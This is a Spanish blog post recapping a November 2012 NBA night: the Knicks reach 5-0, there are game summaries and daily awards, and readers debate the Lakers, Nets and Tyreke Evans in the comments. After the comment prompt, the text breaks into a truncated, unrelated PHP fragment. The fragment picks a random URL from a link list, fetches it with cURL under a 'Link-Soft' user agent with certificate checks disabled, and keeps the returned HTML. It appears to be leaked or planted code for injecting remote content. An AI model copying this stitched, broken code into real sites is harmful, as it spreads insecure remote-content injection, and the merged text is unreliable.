La Crónica: Manita de los Knicks

14 de November de 2012 por Viva_Dirk

Seis duelos nos deja la noche de ayer, todos ellos entre equipos de la misma conferencia.

Los Knicks siguen invictos y ya están 5-0. Ganaron a los Magic con un buen Carmelo y un tremendo JR Smith desde el bancoCarmelo anota sin oposición (99-89). Por los Magic hasta 7 jugadores acabaron en dobles dígitos de anotación, destacando JJ Redick con 18-4-7 y un doble-doble de Vucevic. Un juego mucho más coral el de los Magic qie no llegó a buen puerto debido a sus 20 pérdidas de balón, más del doble que los Knicks.

Los Bobcats alcanzan el 50% en victorias-derrotas a costa de uno de los farolillos rojos como los Wizards (76-92). La pareja Sessions-Walker puso la dinamita desde el perímetro y Gilchrist&Haywood el trabajo debajo de los tableros. Los de la capital esperan la vuelta de Wall y Nene para dejar de hacer el ridículo y mientras tanto se van turnando para ‘liderar’ al equipo. Ayer le tocó a Ariza.

Lamentable partido en Indiana. No quiero imaginarme a alguno de los mas puristas del baloncesto americano al ver tal esperpento. Los Raptos se llevaron la victoria pese a anotar nada más y nada menos que ¡5 puntos! en el último cuarto (74-72). Triple doble para Calderón que sigue a gran nivel. En los Pacers resulta casi imposible destacar a nadie. George Hill anotó 18 puntos con una mala serie de tiro y el resto ni eso.

Todo lo contrario en Brooklyn donde los locales vencieron a los Cavs gracias a un 54% en tiros de campo (101-114). El trio Deron-JJ-Lopez rindió como se espera de ellos sumando 74 puntos. En frente vimos un partido bestial de Varejao y no es el primero. 35 puntos y 18 rebotes con un 16 de 21 en tiros no es algo que pueda lograr cualquiera. Irving no se quedó muy atrás pero no fue suficiente para llevarse la victoria.

Brook López lanza a canasta ante la oposición de Varejao y LeuerEn Sacramento los Blazers dieron buena cuenta de unos Kings sin Cousins ni I.Thomas. El quinteto titular de los visitantes anotó más que todo el equipo de los locales. Todos estuvieron entre los 10 y los 22 puntos con el rookie Lillard al mano de las operaciones (103-86). En los Kings, mediocridad general, con mención especial para un Tyreke Evans del que ya no sabemos que esperar.

Cayeron los Lakers en el Staples frente a los Spurs mientras esperan la llegada de Mike D’Antoni. Ganaban de 3 a falta de 1 minuto pero acertaron Duncan primero y Danny Green después mientras que no lo hicieron MWP ni Gasol en el aro contrario(84-82). Los Spurs perdieron 8 balones en todo el partido, mientras Duncan&Parker hacían lo que mejor saben hacer. En los Lakers otro grandísimo partido de Kobe y un Howard algo gris no fueron suficiente, ya que Pau estuvo aún más gris y MWP dio una de sus habituales lecciones de tiro con 4 de 14.

PREMIOS

MVP: Premio combinado a la terna de Brooklyn. Deron Williams consiguió un doble-doble de 26 puntos y 10 asistencias, mientras que su compañero Joe Johnson cosechaba otros 25 puntos a los que sumaba 6 asistencias y 5 rebotes. Brook López completaba el trabajo con 23 puntitos y 7 rebotes. Imposible destacar a uno por encima del resto.

Rookie: Poca discusión en el día de hoy. Damian Lillard volvió a mostrarse algo más que sólido en la victoria de su equipo con 22 puntos y 9 asistencias con poquísimos fallos. Kidd-Gilchrist fue el único que puso algo de oposición al premio con 15 puntos y 8 rebotes y un gran partido. Waiters, Valanciunas y Beal lo intentaron, pero quedaron lejos.

Sorpresa: Triple-doble de Calderón con 13 puntos, 10 rebotes y 10 asistencias. Su contrato será horroroso, no lo niego, pero que queréis que os diga.

Decepción: Nos sigue decepcionando el nivel de Tyreke Evans. Queremos mucho más de él. 

Esfuerzo en vano:  Partidazo de la pareja Irving-Varejao que se quedó en nada. El brasileño se fue hasta los 35 puntos y 18 rebotes mientras que el ROY del año pasado hizo 34 puntos y 8 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Rompe dice:
    #1

    El pobre Calderón se merecía un MVP, menudo partidazo del chaval!

      Citar

  2. nba dice:
    #2

    Wow, yo creia que los Lakers serian barridos por los Spurs, pero al final ha sido una derrota sin mas, la mala suerte que tiene Gasol, siempre queda en evidencia en el Staples, que un tapon no te puede robar un rebote que ya tienes en las manos copon !!!

      Citar

  3. simon dice:
    #3

    Madremia tyreke debe ser ahora mismo de los 10 peores titulares de toda la liga. Por cada acierto tiene 5 decisiones erroneas o nefastas… Una lastima como se ha venido abajo.

      Citar

  4. Denise dice:
    #4

    En el MVP de la jornada ha faltado Varejao, su 35-18 con 16/21 en tiros de campo puede ser la mejor marca individual de la temporada.

    Tyreke va a ser un Ben Gordon de la vida…o ni eso, porque Gordon hizo todavía cosas importantes con sus Bulls.

    Sobre los Lakers, sigo sin entender como entre Pau y Howard tiraron solo 19 veces, los mismos tiros que Kobe. Howard tiene que tener un rol más importante en ataque. A Meeks sigue sin darle continuidad, al chaval no le dejan entrar en la dinámica, es mejor jugador de lo que está demostrando en L.A.. Y luego está Morris, bfff que calamidad de jugador, no ya por lo de hoy, sino lo llevo diciendo mas veces, es un horrible jugador, de lo peor que he visto en una cancha; muchos se reían de Smush Parker, joder cuando Smush era el segundo mejor jugador de aquellos Lakers e hizo un montón de partidazos aunque fuera chupón; pero es que este Morris ni anota, ni asiste, ni defiende, es una lacra. Nunca he sido fan de Duhon, pero tras la ausencia de Nash, Duhon debe ser títular por delante de Blake y Morris.

    Sobre los Magic, a pesar de todo, juegan bastante bien, lo que pasa es lo de siempre, que hay un momento en el que la gasolina se acaba, las ideas se nublan y la bola quema, y ahí si te hace falta un jugador franquicia para que el partido caiga de tu lado, pero aún así gran partido en conjunto frente al que para mí es el 2º mejor equipo del Este, y encima con Felton y Smith bastante enchufados ayer.

    Otro equipo perdedor que me gusta como juega son los Blazers, el problema es su banquillo, pero debe ser uno de los 5 iniciales que más anoten en la competición.

    Y sobre los Nets, pintan bien, a estas alturas del año, con entrenador nuevo y bastantes fichajes, pensaba que estarían menos rodado, con menos automatismos entre ellos, y aun así sin Brooks y Wallace, están masacrando a sus rivales. El equipo es bastante profundo y si Blatche y Childress rindieran a su mejor nivel, serían un candidato peligrosísimo. Buen trabajo de momento el de Mr. Bonobus

      Citar

  5. GreenPride dice:
    #5

    Acabo de ver el Lakers-Spurs. Partido muy decepcionante más propio de pretemporada que de otra cosa, el marcador no engaña. Creo que queda todo dicho diciendo que los Spurs se llevan la victoria con un 38% en tiros de campo y cogiendo 10 rebotes menos lo que da idea del partido también de los de LA. Por los Spurs buen trabajo de Parker, Duncan, Leonard, Splitter y Green compensando el horroroso partido de Manudona que debe ser de las primeras veces que no juega los minutos finales de un partido igualado. Muy mal también Gary Neal.
    Por los Lakers decir que están en época entre entrenadores y se nota. No hay sistemas y cada uno juega un poco lo que le viene en cada momento. Sólo Kobe hizo un partido acorde a lo que se supone de su calidad. Howard coge muy poco balón en ataque y sus tiros vienen más de continuaciones o rebotes que de jugadas para él. Por su parte Pau hizo un partido infame hasta los últimos 3 minutos en los que pasó de lavar su imagen y ser el salvador del partido con dos acciones consecutivas de ataque (4 puntos que los ponían arriba de 3) a ser el villano dejando que Parker le birlara un rebote de las manos y luego fallando el tiro decisivo en una jugada final en la que nada de lo preparado en el tiempo muerto se vio luego en la cancha (Kobe y Pau parecían hablar con Artest que parecía haberse saltado la jugada preparada). En general mal partido de Pau e infame de los jugadores de reparto de LA. Horrible Artest tirando y fallando más de lo que debe, fatal Morris (vaya jugador más malo), fuera de sitio dos jugadores muy aprovechables como Meeks o Jamison con lo que el banquillo laker queda bajo mínimos con la única contribución de Hill. Desde luego D’Antoni tiene trabajo. Parece que debutará en el siguiente partido, veremos qué ideas trae para hacer jugar a este equipo que de momento está un tanto perdido sin saber a lo que juega. Queda tiempo y hay jugadores para enderezar el rumbo, las próximas semanas se irá viendo cómo va la cosa en LA.
    Del resto destacar una nueva victoria de los Knicks aunque esta vez ante un equipo de los de abajo, el buen hacer de los Nets que apuntan a candidato, los partidazos de Varejao y Irving que no les valieron para ganar y el mal momento de Indiana, equipo que parece en clara decadencia respecto al año pasado entre la baja de Granger y el mal momento del resto.

      Citar

  6. GreenPride dice:
    #6

    Y para hoy gran jornada con dos partidazos el Memphis-OKC y el Miami-LA Clippers. 4 de los equipos que mejor han empezado la temporada y de los llamados a ser protagonistas en la lucha por el título así que se presenta una noche divertida

      Citar

  7. Esteban dice:
    #7

    bienvenido a jo jhonson a la temporada 2012/2013 de la NBA, al fin se le vio un partido decente, venia siendo lo peor que habia visto de el en su carrera, ayer al menos no lanzo 3/13 como nos tenia acostumbrados

    muy bien los nets, que hoy deberian estar 5-1 si no hubiesen dejado escapar el juego frente a los wolves, q llegaron a estar la frente por 25 puntos

    mi candidato al entrenador del año Avery Jhonson, aun esta buscando el equipo, no confia en teletovic, lo que para mi es un errror, pero ha encontrado soluciones magicas como stackhouse, que ha hecho muy buenos partidos ultimamente, muy llamativo, lo mismo blatche de muy bien temporada en ofensiva hasta el momento

    cuando vuelvan brooks y wallace, para mi son junto a knicks los unicos capaz de disputarles la conferencia al heat

      Citar

  8. Vader dice:
    #8

    @Denise

    ¿Los Nets han cambiado de entrenador? ¿Ya no esta Avery Bonobus?

      Citar

  9. Esteban dice:
    #9

    Lo de Pau Gasol ya está comenzando a rozar el ridículo y no porque sea todo su culpa. En este partido en particular tomó 10 tiros, de los cuales apenas encestó 3. ¿Saben cuantos dentro de la zona pintada? ¡Ninguno!. Increíble… los Lakers tienen a uno de los mejores jugadores de poste bajo del Mundo y lo usan como si fuera Ryan Anderson o Channing Frye. Para colmo, esa decisión en la última jugada del partido, lo va a volver a poner en el rol de chivo expiatorio de todos los males de la franquicia.

      Citar

  10. Esteban dice:
    #10

    Esteban:
    Lo de Pau Gasol ya está comenzando a rozar el ridículo y no porque sea todo su culpa. En este partido en particular tomó 10 tiros, de los cuales apenas encestó 3. ¿Saben cuantos dentro de la zona pintada? ¡Ninguno!. Increíble… los Lakers tienen a uno de los mejores jugadores de poste bajo del Mundo y lo usan como si fuera Ryan Anderson o Channing Frye. Para colmo, esa decisión en la última jugada del partido, lo va a volver a poner en el rol de chivo expiatorio de todos los males de la franquicia.

    cortesia de la pagina comojuega.com

      Citar

  11. Ruxixón dice:
    #11

    simon:
    Madremia tyreke debe ser ahora mismo de los 10 peores titulares de toda la liga. Por cada acierto tiene 5 decisiones erroneas o nefastas… Una lastima como se ha venido abajo.

    Lo siento simon,pero creo que después de ver un Wizards@ Bobcats te puedo rebatir eso,¡¡los 10 peores estaban en ese partido!!! No,hay jugadores decentes pero también clarísimos candidatos a una amnistía como Okafor o Tyrus Thomas,que malos son por dios.

    Decir que bueno,dentro de lo malo se pueden sacar apuntes:

    – Los Bobcats dentro de la dinámica de equipo malo,se les ve con mucha actitud,buen trabajo en ese sentido de Dunlap.Kidd-Gilchrist creo que ha caído en el equipo de buena manera si bien no se puede hablar de jugador franquicia.De hecho no hay jugador franquicia en los Bobcats y por ahí deberían dejar a Kemba que vaya asentándose como un buen jugador que apunte a escudero cuando tengan la oportunidad de acoger a una superestrella.Sessions en un equipo de la parte baja se sale,y bueno,el resto tiene minutos para mayor o menor gloria,pero se ve otro aire en el equipo de Jordan.

    – Los Wizards,infumables.Tuve las narices de ponerlos en PO’s en la porra,también confiando en la explosión definitva de Wall que ya veremos.De momento se presenta como el peor equipo que he visto esta temporada con una enorme diferencia.El mejor Ariza como se dice allí arriba.Beal de momento bacalá bajo mi punto de vista,tirando a chupón por momentos.Posiblemente sea un jugador cuya mejor versión saldrá bien avanzada la temporada.Booker,Seraphin y Vesely en la línea que se presupone.Ahora mismo quitaría a Okafor de las rotaciones y sacaría más minutos a los dos últimos de ese trio,de ellos se puede esperar que progresen,Okafor sólo va cuesta abajo.De hecho cuando vuelvan Wall y Nené,pondría a Vesely de 4 a jugar con el brasileño,y en la rotación jugaría con un AJ Price-Jordan Crawford-Singleton-Booker-Seraphin.

      Citar

  12. Gallo33 dice:
    #12

    Joe Johnson se come a Wade por todos los lados.

      Citar

  13. Esteban dice:
    #13

    Sobre lo hablado de evan turner, da la sensacion que ofensivamente nunca sera grandioso, pero es un defensor y jugador de equipo capaz, un alero q da un salto a un equipo con otra estrella

    Los bucks podrian estar interesados en el y los 76 en ellis
    Si quieren convencer a Bynum, necesitan otra pseudo estrella tipo monta para hacer lo q hicieron los nets con jojo y deron

    De otro modo, perderan a bynum en manos de los hawks o rockets

      Citar

  14. Esteban dice:
    #14

    Warrick por carrol primer trade, bueno para ambos, los hornets se quitan un año de contrato de warrick y continuan con su limpieza de salarios, ademas warrick no tenia lugar con davis, lopez, smith y anderson por delante

    Los bobcats siguen alejandose de ser el peor equipo de la nbaa pero no mucho mas, warrick podra darle minutos y anotacion a un equipo que lo necesita

    Los bobcats van 3 y 3 y han jugado sin henderson y gordon algunos juegos, a mi entender tienen un buen equipo, la octava del este esta muy barata, raptors, cavs y hawks no son mucho mejores que ellos, cuidado con los bobcats

      Citar

  15. Jose Luis dice:
    #15

    El segundo año de Warrick era opción de equipo, así que era un potencial expiring de todas formas. Quizá le vean utilidad a Carroll, porque contractualmente eran casi lo mismo. 0,5M más cobraba Carroll que Warrick. Los Bobcats supongo que si le ven utilidad a Warrick.

      Citar

  16. HisRoyalAirness dice:
    #16

    Gallo33:
    Joe Johnson se come a Wade por todos los lados.

    Di que sí.

    NO

      Citar

  17. MagicJohnson32 dice:
    #17

    Pues a mí el Spurs-Lakers me pareció un gran partido, con bajas importantes y jugadores clave en baja forma, sí, pero con unos Lakers meritorios y con algunas señales positivas. Por ejemplo, el partido anticipó una posible solución ante la falta de bases (de bases válidos, quiero decir): Kobe. Cuando Nash descanse, no me extrañaría que D’Antoni pusiese a Kobe de base. Ayer jugó realmente bien. Además, está anotando con una efectividad bestial (más de 26 ppp con 17 tiros, un 55% en FG, 42% en triples y 92% en FT), y busca continuamente el pase a Howard / Gasol.

    Y no me digáis que los Lakers tienen que buscar más a Dwight, si se pasan cada posesión buscádole. Howard no está bien físicamente, pierde balones absurdos (más que de costumbre), le cuesta imponerse en el poste bajo y, además, está la historia de siempre con las faltas (le pegan unos palos tremendos que no pitan). Por eso sus números de tiros no son más altos, no porque no lo busquen.

      Citar

  18. nba dice:
    #18

    Evidentemente Howard esta en proceso de recuperacion fisica, con tal de que llegado marzo llegue a tope, a los Lakers le debria de bastar,tienen a 5 tios interiores validos para rotar sin perder intensidad(Howard-Pau-Jamison-Hill-Sacre), del tema de Kobe de base, pues puede ser una solucion si con eso se consigue que Meeks juegue mas minutos
    Por cierto Jordan debe estar dando saltos de alegria, menudo comienzo de los Bobcats, que se acaban de calzar a los Wolves

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>